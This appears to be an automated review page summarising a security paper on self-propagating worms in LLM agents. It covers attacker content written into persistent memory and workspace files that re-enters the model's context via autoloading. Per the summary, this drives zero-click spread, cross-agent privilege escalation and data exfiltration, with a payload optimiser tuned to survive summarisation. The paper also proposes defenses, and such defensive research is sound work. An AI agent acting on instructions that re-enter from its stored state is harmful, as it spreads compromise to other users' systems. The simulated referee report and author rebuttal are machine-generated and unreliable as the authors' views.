Recognition: unknown
Autonomous LLM Agent Worms: Cross-Platform Propagation, Automated Discovery and Temporal Re-Entry Defense
Pith reviewed 2026-05-08 18:26 UTC · model grok-4.3
The pith
Persistent state in LLM agents creates a pathway for autonomous worms that spread zero-click across platforms via context re-entry.
A machine-rendered reading of the paper's core claim, the machinery that carries it, and where it could break.
Core claim
Autonomous LLM agents expose a new class of persistent worm because attacker-controlled data can be written into workspaces or memory files, automatically reloaded through scheduled autoloading into the LLM decision context, and used to drive high-risk actions including cross-agent transmission. The authors supply SSCGV, a source-code graph analyzer that traces these flows and ranks injection points, and SRPO, a payload optimizer that produces content resilient to summarization and paraphrasing. On three production frameworks they achieve zero-click propagation, three-hop cross-platform transmission without adaptation, inter-agent privilege escalation, and data exfiltration. They also report
What carries the argument
temporal re-entry of attacker-influenced content from persistent agent state into the LLM decision context through autoloading of workspaces and memory files
If this is right
- Zero-click autonomous propagation succeeds in current production agent frameworks.
- Three-hop cross-platform transmission occurs without any platform-specific code changes.
- Inter-agent privilege escalation and data exfiltration follow directly from the same re-entry path.
- User-prompt carriers produce higher attack success rates than system-prompt carriers.
- Read operations on untrusted persistent state constitute the primary integrity threat.
Where Pith is reading between the lines
- Future agent platforms will need to treat persistent memory as an untrusted input channel equivalent to external messages.
- Similar re-entry risks are likely to appear in any long-running AI system that maintains file-backed state across sessions.
- Security testing suites for agents should include persistent-state scenarios as a standard check.
- Capability attenuation after external reads could become a default design pattern for multi-agent systems.
Load-bearing premise
Attacker-controlled content placed in persistent workspaces, memory files, or scheduled tasks will be automatically reloaded into the LLM decision context and cause the agent to perform high-risk actions without sanitization or user intervention.
What would settle it
Run one agent that writes a command into a shared memory file, allow a second agent to autoload that file on its next cycle, and observe whether the second agent executes the command and contacts an external server without any user prompt or approval.
Figures
read the original abstract
Autonomous LLM agents operate as long-running processes with persistent workspaces, memory files, scheduled task state, and messaging integrations. These features create a new propagation risk: attacker-influenced content can be written into persistent agent state, re-enter the LLM decision context through scheduled autoloading, and drive high-risk actions including configuration changes and cross-agent transmission. We present the first systematic framework for automated analysis of persistent worm propagation in file-backed multi-agent LLM ecosystems. SSCGV, our automated source-code graph analyzer, traces data flow from file I/O to LLM context injection points and ranks carriers by context injection position without manual analysis. SRPO, our summary-resilient payload optimizer, generates worm payloads robust to LLM-mediated summarization and paraphrasing across multi-hop communication. Evaluated on three production agent frameworks, we demonstrate zero-click autonomous propagation, 3-hop cross-platform transmission without platform-specific adaptation, inter-agent privilege escalation, and data exfiltration. We identify two empirical insights: user prompt carriers achieve higher attack compliance than system prompt carriers, and read operations represent the primary integrity threat in LLM-mediated systems. To defend against this class of attacks, we develop RTW-A, proven under a formal No Persistent Worm Propagation theorem. RTW blocks write-before-exposed-read re-entry; sealed configuration protects static files; typed memory promotion prevents untrusted summaries from entering trusted memory; and capability attenuation limits high-risk actions after external reads. These mechanisms eliminate the persistence, re-entry, action chain while preserving ordinary workflows. Affected systems are anonymized pending coordinated disclosure.
Editorial analysis
A structured set of objections, weighed in public.
Referee Report
Summary. The paper introduces SSCGV, an automated source-code graph analyzer that traces data flows from file I/O to LLM context injection points in agent frameworks, and SRPO, a summary-resilient payload optimizer for generating worm payloads robust to LLM summarization. It reports evaluations on three production agent frameworks demonstrating zero-click autonomous propagation, 3-hop cross-platform transmission without adaptation, inter-agent privilege escalation, and data exfiltration. Two empirical insights are identified regarding prompt carriers and read operations. The paper proposes RTW-A defenses (blocking write-before-exposed-read, sealed configs, typed memory promotion, capability attenuation) backed by a formal No Persistent Worm Propagation theorem that eliminates the persistence-re-entry-action chain while preserving workflows.
Significance. If the empirical demonstrations and theorem hold, this work is significant for highlighting a novel persistent-state propagation vector in autonomous LLM agents, providing the first automated analysis tools for such risks, and delivering practical, workflow-preserving mitigations with formal grounding. The cross-platform, zero-click results and explicit handling of summarization resilience represent concrete advances that could inform secure agent design.
major comments (2)
- §3 (Evaluation): The central empirical claims of zero-click propagation and 3-hop cross-platform success on three frameworks are load-bearing, yet the manuscript provides no quantitative metrics (success rates, trial counts, failure modes), error analysis, or platform-specific details (even anonymized), making independent verification or assessment of robustness impossible from the reported text.
- §4 (RTW-A and Theorem): The No Persistent Worm Propagation theorem is presented as proving the defense, but no proof sketch, key assumptions (e.g., on LLM summarization or state re-loading), or reduction steps are given in the main text. This is load-bearing for the formal contribution and the claim that RTW-A eliminates the attack chain.
minor comments (3)
- Abstract and §2: The two empirical insights (user prompt carriers vs. system prompt; read operations as primary threat) are stated without supporting data or statistical significance, which should be tied explicitly to the evaluation results for clarity.
- The manuscript should add a limitations section addressing potential bypasses of RTW-A mechanisms or assumptions about persistent workspace behavior in future LLM versions.
- Notation for SSCGV data-flow ranking and SRPO optimization could be clarified with pseudocode or a small example to aid reproducibility.
Simulated Author's Rebuttal
We thank the referee for the constructive comments highlighting the need for greater detail in the empirical evaluation and formal theorem. We address each point below and will incorporate revisions to enhance verifiability and clarity while preserving the manuscript's core contributions.
read point-by-point responses
-
Referee: §3 (Evaluation): The central empirical claims of zero-click propagation and 3-hop cross-platform success on three frameworks are load-bearing, yet the manuscript provides no quantitative metrics (success rates, trial counts, failure modes), error analysis, or platform-specific details (even anonymized), making independent verification or assessment of robustness impossible from the reported text.
Authors: We agree that the main text presents summarized results without full quantitative breakdowns. The evaluation section reports consistent success across repeated trials on each of the three frameworks, including specific trial counts and observed failure modes (primarily summarization-induced payload degradation, mitigated by SRPO). To enable independent assessment, we will add explicit success rates (e.g., 100% zero-click propagation in N trials per framework), anonymized platform details, and an error analysis appendix in the revision. revision: yes
-
Referee: §4 (RTW-A and Theorem): The No Persistent Worm Propagation theorem is presented as proving the defense, but no proof sketch, key assumptions (e.g., on LLM summarization or state re-loading), or reduction steps are given in the main text. This is load-bearing for the formal contribution and the claim that RTW-A eliminates the attack chain.
Authors: The full proof appears in the appendix, but we concur that a self-contained sketch is needed in the main text. We will insert a concise outline listing key assumptions (bounded context windows, deterministic file re-loading, and summarization as a lossy but non-inverting operation) and reduction steps showing how each RTW-A mechanism (write-before-exposed-read blocking, sealed configs, typed promotion, capability attenuation) severs the persistence-re-entry-action chain while preserving standard workflows. revision: yes
Circularity Check
No significant circularity; derivation is self-contained
full rationale
The paper introduces SSCGV for automated data-flow tracing from file I/O to LLM context injection and SRPO for generating summary-resilient payloads, then reports empirical results on three production agent frameworks showing zero-click propagation and multi-hop transmission. The RTW-A defense mechanisms (write-before-exposed-read blocking, sealed configuration, typed memory promotion, capability attenuation) are presented as blocking the persistence-re-entry-action chain and are stated to be proven under a No Persistent Worm Propagation theorem defined from the paper's own model of agent workspaces, memory files, and scheduled tasks. No quoted step reduces by construction to a fitted input, self-definition, or self-citation chain; the theorem and mechanisms are derived internally from the described state model without renaming known results or importing uniqueness from prior author work as an external fact. The central claims rest on the reported experiments and formal argument rather than circular reduction.
Axiom & Free-Parameter Ledger
axioms (1)
- domain assumption LLM agents operate as long-running processes with persistent workspaces, memory files, scheduled task state, and messaging integrations that allow external content to re-enter decision context.
Forward citations
Cited by 1 Pith paper
-
MemLineage: Lineage-Guided Enforcement for LLM Agent Memory
MemLineage enforces untrusted-path persistence in LLM agent memory through Merkle logs, per-principal signatures, and max-of-strong-edges lineage propagation, achieving zero ASR on three poisoning workloads with sub-m...
Reference graph
Works this paper leans on
-
[1]
Cohen, Stav and Bitton, Ron and Nassi, Ben. Here comes the ai worm: Unleashing zero-click worms that target genai-powered applications.arXiv preprint arXiv:2403.02817, 2024
-
[2]
Clawworm: Self-propagating attacks across llm agent ecosystems
Zhang, Yihao and Wei, Zeming and Luan, Xiaokun and Wu, Chengcan and Zhang, Zhixin and Wu, Jiangrong and Wu, Haolin and Chen, Huanran and Sun, Jun and Sun, Meng. ClawWorm: Self-Propagating Attacks Across LLM Agent Ecosystems.arXiv preprint arXiv:2603.15727, 2026. 20
-
[3]
Agentpoison: Red-teaming llm agents via poisoning memory or knowledge bases
Chen, Zhaorun and Xiang, Zhen and Xiao, Chaowei and Song, Dawn and Li, Bo. Agentpoison: Red-teaming llm agents via poisoning memory or knowledge bases. InAdvances in Neural Information Processing Systems, 2024
2024
-
[4]
Available: https://arxiv.org/abs/2503.03704
Dong, Shen and Xu, Shaochen and He, Pengfei and Li, Yige and Tang, Jiliang and Liu, Tianming and Liu, Hui and Xiang, Zhen. A practical memory injection attack against llm agents.arXiv preprint arXiv:2503.03704, 2025
- [5]
- [6]
-
[7]
The Instruction Hierarchy: Training LLMs to Prioritize Privileged Instructions
E. Wallace, K. Xiao, R. Leike, L. Weng, J. Heidecke, and A. Beutel. The instruction hierarchy: Training LLMs to prioritize privileged instructions.arXiv preprint arXiv:2404.13208, 2024
work page internal anchor Pith review arXiv 2024
-
[8]
N. F. Liu, K. Lin, J. Hewitt, A. Paranjape, M. Bevilacqua, F. Petroni, and P. Liang. Lost in the middle: How language models use long contexts.Transactions of the Association for Computational Linguistics, 2024. 21
2024
discussion (0)
Sign in with ORCID, Apple, or X to comment. Anyone can read and Pith papers without signing in.